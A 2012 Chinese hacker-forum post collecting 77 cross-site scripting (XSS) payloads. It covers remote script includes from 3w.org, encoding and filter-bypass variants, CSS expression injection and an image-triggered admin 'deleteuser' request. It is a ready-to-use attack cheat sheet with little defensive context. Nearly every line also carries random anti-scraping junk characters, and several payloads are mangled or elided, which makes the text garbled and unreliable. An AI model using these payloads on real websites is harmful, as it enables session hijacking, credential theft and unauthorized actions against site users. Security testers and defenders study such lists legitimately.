找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3561|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
* x+ }* m* r1 `. w6 X3 I% \
4 k6 i; ?! J  Q0 C7 Z) j (1)普通的XSS JavaScript注入
& n  p' M" J3 N0 } <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; Q" e8 B: W2 b, k5 G

# ~* {3 U( S5 D+ E  e, r+ b; z: h (2)IMG标签XSS使用JavaScript命令0 h* q6 c% x. x2 L& [* ^* u
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 w8 d- f) a1 m5 b5 y/ z9 O

0 S. k9 f4 k( V1 a (3)IMG标签无分号无引号3 I/ V( a0 S% T. P" {0 p5 k  w3 _: S
<IMG SRC=javascript:alert(‘XSS’)>4 \! C' o- p& Z! z
- ?+ \4 H8 }; ?* `) S
(4)IMG标签大小写不敏感
7 C9 H) A4 I$ b <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
( s+ O# O8 A* Y- d  H' e0 l' b% J3 {4 z/ e9 L
(5)HTML编码(必须有分号)- D1 j: k3 a8 O
<IMG SRC=javascript:alert(“XSS”)>
; l0 R4 B" G" {8 o( m' {  W4 `; N9 \# m* x; T) R# K& K
(6)修正缺陷IMG标签6 z' [- [# i" B8 {- c1 ]) k' b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- i% j) ]0 V2 ?( }: s" I/ f
* }. G$ B* b' W! z" i (7)formCharCode标签(计算器)
9 P. Z4 U( I* l2 S. T! v  { <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! A$ J! {9 ?; O: W: L: ^4 e" X! x$ I2 ]. E% P: k' L$ m
(8)UTF-8的Unicode编码(计算器)1 H. t3 O) i  |' T% U- @- s1 ?
<IMG SRC=jav..省略..S')>" z+ t: P( O$ g3 l" v  Q) t( p# |

' B+ E) [! r( }8 s5 O1 ?/ f (9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 ~; v9 Q& A) v, s/ M1 s
<IMG SRC=jav..省略..S')>
% w" o/ S1 H# U2 G+ c/ L2 L! R: ]  `
9 `8 _. v7 d% y; P  L' K, b (10)十六进制编码也是没有分号(计算器), Z+ a* l4 T" n+ p9 m$ L9 G
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>4 p2 Q5 m1 w+ V6 U
; d$ u+ H  s2 C# c1 I' O
(11)嵌入式标签,将Javascript分开
; e# b! Y7 ~& P <IMG SRC=”jav ascript:alert(‘XSS’);”>
: x$ v' a0 w5 o
) B6 O0 E# ~# C (12)嵌入式编码标签,将Javascript分开
- \; G- [/ ~: k9 k' Y+ `6 Q <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 _1 U+ Q/ h9 l: O, g. k: O& _: p. X: ?$ @" Y# j9 A
(13)嵌入式换行符
( J6 W% J% a3 J4 U+ x8 l# O: ^ <IMG SRC=”jav ascript:alert(‘XSS’);”>- W0 |2 u: b; ^3 L' I' }
" M, E3 T; d! g2 m9 v/ Z1 r6 p
(14)嵌入式回车
5 }9 [% ~, y$ T  M% g <IMG SRC=”jav ascript:alert(‘XSS’);”>
. H' `! m8 y% }3 q1 `# z: ]/ N* h6 R  L% V8 Q. p2 R
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 q6 n! l4 X+ J/ {3 m: u/ b5 d, G <IMG SRC=”javascript:alert(‘XSS‘)”>$ ^! X. Y' G& ]/ u( \

: w0 a4 G, z1 T# T9 ? (16)解决限制字符(要求同页面)
& Y( A8 |+ J9 _3 g/ M. P+ O: v, f" I <script>z=’document.’</script>; O: _1 T' Q) O5 W1 C8 y, s+ Y
<script>z=z+’write(“‘</script>: P8 L) V6 @; u- ~
<script>z=z+’<script’</script>; A8 f9 z7 y/ Y: G
<script>z=z+’ src=ht’</script>
; K, R# ]$ {; L4 T <script>z=z+’tp://ww’</script># t6 ~6 N% F: L& ~8 }4 t+ f2 U
<script>z=z+’w.shell’</script>
2 I/ }& O7 K3 M6 x <script>z=z+’.net/1.’</script>
& s7 K0 d% }8 Q' L& g; X. c <script>z=z+’js></sc’</script>; m5 p. o% C& ^. R7 j
<script>z=z+’ript>”)’</script>
# V5 D" `5 I1 F <script>eval_r(z)</script>/ t6 g# A6 l( |+ p, ]) p
7 |, l. |5 x' @; L; I" S
(17)空字符
, ~) ?0 P  b/ U) E; b perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out* ~5 W) n2 x; A  y& n! u1 K2 M

2 Z7 Z1 S/ S' @7 T0 a7 q (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用$ p8 X# [& p, z4 S. B( s
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: |; H) i' n: H! B2 S
5 i3 i2 D7 J. h9 K7 z3 S9 _
(19)Spaces和meta前的IMG标签, F6 |6 _) D7 E5 N+ d) S
<IMG SRC=”   javascript:alert(‘XSS’);”>
3 z. q; D7 q7 f# r: k8 N+ D
* a0 v) G0 N7 Q; e (20)Non-alpha-non-digit XSS3 _' L& s& e5 i3 A
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 s- v9 W# E! i3 g6 H  I
# c5 m7 ^" m( ~- d
(21)Non-alpha-non-digit XSS to 2
: [3 E7 K/ X+ J- O6 O <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% b5 R, J1 q% ?. f: i
3 _, N6 T1 o9 E% `0 K  M
(22)Non-alpha-non-digit XSS to 3+ X+ L. w7 Z: C6 Y- V  q
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>( h; ?/ o9 {3 `* @; u

" n$ V6 R& f5 B2 f9 h) L (23)双开括号
" P3 \1 B# U2 i( A- T+ g1 u6 u) b <<SCRIPT>alert(“XSS”);//<</SCRIPT>0 @9 B5 a7 a8 Q/ d  x9 ]+ m, K0 E7 K

+ a" G" x% O' b: `: S (24)无结束脚本标记(仅火狐等浏览器)
7 T8 _+ n# c" b <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% O0 F5 ~& R) g- {7 h- m# }

9 N+ T6 `% U7 q7 D0 O" w3 B9 Q3 s: @ (25)无结束脚本标记20 J) I0 D' c0 _# N1 Q6 P
<SCRIPT SRC=//3w.org/XSS/xss.js>- y& h1 f1 K0 M' G  H' }7 `/ |
+ B, b+ L, a1 x! z1 b0 r+ @1 b' m
(26)半开的HTML/JavaScript XSS% s2 a1 s8 `4 T5 z3 _1 ?1 x, T8 t  ~
<IMG SRC=”javascript:alert(‘XSS’)”; y' F. G( a0 Q7 ^  L0 c5 W
3 x# x/ B' m% I  s0 ~: ^6 E/ W- A9 `
(27)双开角括号: `2 b$ c  q; S1 `
<iframe src=http://3w.org/XSS.html <
# ]: I' o. U# A. N* Z: z, s- `" o) H8 g% i
(28)无单引号 双引号 分号
8 {0 \2 R  N4 _2 b- i <SCRIPT>a=/XSS/0 w5 M$ D. N; _; g9 T1 r7 V, k
alert(a.source)</SCRIPT>
/ y: L1 b2 n/ K' |$ b/ S3 O2 J% c% P/ }! j6 O
(29)换码过滤的JavaScript
- b8 [# F* \/ e/ A4 E4 Y2 u \”;alert(‘XSS’);//( Y7 T* `- g3 ]
4 L. f: `& v& d
(30)结束Title标签
- m8 b) J9 ^1 I: A5 G </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' f0 ~) f) Z. m, k4 R7 F" E$ M5 G: ?; u" h* Z* U7 s
(31)Input Image3 o0 G4 P7 n! D5 Q$ k0 y
<INPUT SRC=”javascript:alert(‘XSS’);”>
4 O0 v. a  s: J$ R2 r8 E3 f5 C  j3 C' o+ c% G+ p% c
(32)BODY Image' i* C6 r4 e" a7 ~8 ]
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 `3 D# t1 X8 @8 K

9 ?1 f7 `/ J8 o9 b8 M (33)BODY标签
1 K& A2 ^& M# w+ [# G <BODY(‘XSS’)>1 Y: k# ^4 I2 g; }/ k' m- y8 A2 Q
7 K* u* C. i: ]5 J, n( P- c
(34)IMG Dynsrc3 N2 \# \, H& s* v: Z
<IMG DYNSRC=”javascript:alert(‘XSS’)”>9 k8 ?- l5 o( X* D) O4 Q! S3 ^
5 {: Q" d/ d! O
(35)IMG Lowsrc% R+ L+ H6 M: d, c& [
<IMG LOWSRC=”javascript:alert(‘XSS’)”>% l4 j4 ]" S+ y+ c+ J+ W3 _
5 V+ a: Q1 f6 I; {  Y2 ^' u. w
(36)BGSOUND
. _7 k' T; J7 b% K# s <BGSOUND SRC=”javascript:alert(‘XSS’);”>
* g& d6 G6 E+ r( P
. B, G* f# q# y3 z8 }' {) [& x+ F& p (37)STYLE sheet
  M" P$ p" ~* n' |. A <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
" |9 L3 R% r0 r# }  h2 ~/ b$ O7 n* {) R  j" H- \8 {
(38)远程样式表
2 W' A# l5 L' \0 r" w <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
5 d! ?2 Q7 d1 m8 u
+ M: |: d& e0 ?6 X; e (39)List-style-image(列表式)1 a* {- W5 ?- V( _# g3 D3 R! @
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS/ C' K/ f5 ~- @1 Y
1 z) E3 [+ n7 L% a/ B8 Y
(40)IMG VBscript& W' E5 @, }; R4 N& ]' `* [
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 k! W5 w7 N; T; T" L9 ]' |" w% Z$ l1 ?. p
(41)META链接url) Q8 C, g- i; g
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>1 e, B3 _1 A- z/ V

9 q; `( H8 k/ p* w/ F& q& R6 J2 S" G (42)Iframe
6 D2 b$ S9 H. F. ^) [0 ]7 N <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
. g& F) N: Y, S0 P2 n5 @
; n. S! g* I( f( e) p (43)Frame/ s# g) c, _4 p3 G
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
" V' F: \, f! D- }% T
! N  t/ n$ h; i, N9 y) U (44)Table6 w+ D- V/ m' E6 l' ~4 b8 N
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ X' l! W) N% `2 i0 W* M+ S4 _# h  F8 j
(45)TD
5 l; @( W. w* T! e4 F0 Q <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>' E0 s  c) q1 D0 a9 B
( ]1 _2 W. L. K1 K9 ^; F
(46)DIV background-image
6 m* j4 e1 _9 J  \. E! X' } <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 o& s' h/ P: f) Q! n5 G

- M4 {/ V; F+ I! n (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
1 ]$ n/ {0 j/ g. r# t <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 x6 R$ C# X' G% W; `) z
) `, `: V: a1 a4 P. `, m6 C4 S' \ (48)DIV expression
6 N% @8 Z/ N' t6 p& p8 M <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
; V5 k: X) }1 h, P1 E& ]$ D4 d' g1 r- ^+ S# M6 S1 z1 P
(49)STYLE属性分拆表达/ ]5 H3 l6 c, @( ?+ c; p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ ~9 @( Y2 V( Q8 o2 G4 C# t$ q* V8 N  X$ j' `" ?# i0 e3 T
(50)匿名STYLE(组成:开角号和一个字母开头)' ^4 a5 C4 Y5 l# V" ~7 P4 Y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 g4 ?0 |; ?( i. H' a! g; u

6 Q$ p# t1 [! X% w4 G3 c (51)STYLE background-image- `- @3 }4 Y3 R6 Q! s1 T9 k$ `/ V
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>" }& S) G3 f0 g2 V* s* Y! Y) ^

5 i7 w) B1 N& O( I (52)IMG STYLE方式0 Y7 `- m$ a  r  x, A/ J0 Y: d
exppression(alert(“XSS”))’>( Y0 M3 `( ^, l( i' N# G
( }2 B* y; D3 ~1 R# o' H
(53)STYLE background
, B4 H- }2 l% V6 m5 p <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>0 b3 c# @) Z6 }1 {. e6 a1 @

9 q6 F. m! @! u, e& Q0 ~( e (54)BASE% q+ ^4 C+ {4 |  \* K
<BASE HREF=”javascript:alert(‘XSS’);//”>
; o3 @9 F; c; `" |
8 r3 [& C- }$ N2 @ (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS+ _8 ]+ u: T" o/ ]  f
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
  w% J4 s; Y9 T( K6 f
6 q) n( @; e. @5 s! o0 Z8 H* X, ~ (56)在flash中使用ActionScrpt可以混进你XSS的代码
% i# x/ F! s6 r6 [: X$ `) G1 z a=”get”;
8 I# x% o% z( ^! b5 n b=”URL(\”";
  @8 u, K- |- E4 q7 d c=”javascript:”;, A# `2 u6 e6 Q' P; ]# L- A
d=”alert(‘XSS’);\”)”;
4 x2 ]! q. S4 f' ?# v eval_r(a+b+c+d);
; n4 a% ^  q9 k/ x/ Z9 f$ E+ M+ \  P7 J% m
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 I" @+ A9 G; I6 Q7 G8 R0 ^ <HTML xmlns:xss>
0 y$ E7 Z& w" T( q& o1 | <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>0 F7 T2 o& T# P. ?/ V, W" U
<xss:xss>XSS</xss:xss>
; M4 \  ^0 X$ L# t! L3 K </HTML>: K0 W: e* N5 n; B
* p4 S% P3 c; y/ O9 L/ u/ p
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' x" j# s% {" Y2 X& d <SCRIPT SRC=””></SCRIPT>
7 A/ n' f- j+ l2 s8 u& S/ D! f2 X7 ~3 e$ _  L$ c: X( m# ?/ z
(59)IMG嵌入式命令,可执行任意命令; w( E7 V, A, a
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# f, d5 {- W% X% {! e
9 U; C7 b) }  Z  k. D (60)IMG嵌入式命令(a.jpg在同服务器)6 x3 q3 i. a3 o4 F2 n( R
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- S9 o) J# S, k2 a& N! m

( @$ W6 R& X, K (61)绕符号过滤
' v1 p: G  r! k6 u# Y7 O% W <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& W. N' H3 a6 A! X/ j, {' s( r
' ?8 }& b" |4 [! g1 ?
(62)
" {$ O: ]* X: @. R. q <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 X0 M  I: l: n8 K# R1 I1 s$ |5 _; k3 S1 s  a# A- k/ q
(63)
$ q7 F4 C7 s3 q0 ?3 Y0 L <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% Z+ ?' P1 u2 M/ o- R. @

# D4 G3 w, l. R) ]$ b (64)* g# s) o8 G8 D1 i
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( n5 `% ?$ {2 j3 X2 c

' d4 n8 R. W5 m7 q; I (65)$ |$ z. M/ `) Q5 r. ?. }
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. t# a2 K. S" {/ R
. C5 Q$ C3 a7 t7 J6 S8 n (66)' v; ?8 v# [8 g* s* H" i  Q
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>8 z- T8 e! C0 Q" J
( m/ h) ]3 i, b. X& ]! o9 }7 d
(67)3 e+ T4 a: Y* H
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>. ]# X( V/ M( e$ L2 G
7 p' n" _1 y. D/ R1 j
(68)URL绕行5 N9 s* Y  ~" L6 q
<A HREF=”http://127.0.0.1/”>XSS</A>0 v1 u% l& A" }! a( Q5 G$ w# N

' z/ B. D% W; C. { (69)URL编码1 B" t* S7 G+ M. @
<A HREF=”http://3w.org”>XSS</A>
2 P. w* [( v3 N+ M  H
) k, T; F* [  B- X! g6 A% e8 v (70)IP十进制
0 D8 Y' Q: r9 H3 Z <A HREF=”http://3232235521″>XSS</A>
" [! ~3 @7 d" |# a, R% X; b7 y% \
(71)IP十六进制% B% V, l, n' b: ~* y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>- B$ R! {$ l: k/ d  h! u
2 s0 R* [) G* V" \( F8 j
(72)IP八进制( B" I" e4 z7 J* w
<A HREF=”http://0300.0250.0000.0001″>XSS</A>4 P& n3 X: ]7 Y' e% X
5 Z* |, K6 x" Q( o
(73)混合编码
5 }+ K/ r/ t# a1 T# S; u2 T <A HREF=”h
* D# a# Y* g4 v: P0 b0 i$ a tt p://6 6.000146.0×7.147/”">XSS</A>
' F" _* p9 I4 G) D# M2 G: P9 F
) l( S. \' ]5 |2 H (74)节省[http:]2 L6 B1 q' T6 R; t- Z8 F2 E
<A HREF=”//www.google.com/”>XSS</A>
0 V! G( x' X! c5 A
/ U  V8 n0 A/ i: M7 ]- A, L (75)节省[www]
9 h( V1 a2 h/ n5 P: @ <A HREF=”http://google.com/”>XSS</A>% j4 X& c+ j4 i% h: d8 ^$ R7 Z
' P1 |  j  h5 j! c, F- Z: N6 Y  a0 g
(76)绝对点绝对DNS! s( @1 i. [6 P7 M0 I8 T
<A HREF=”http://www.google.com./”>XSS</A>
  U. i  ~4 I9 G6 E! {2 K# t2 f; ~8 g2 d. [6 ~# E9 a6 s
(77)javascript链接9 j5 v7 ~' l5 o# b3 k( b* e
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表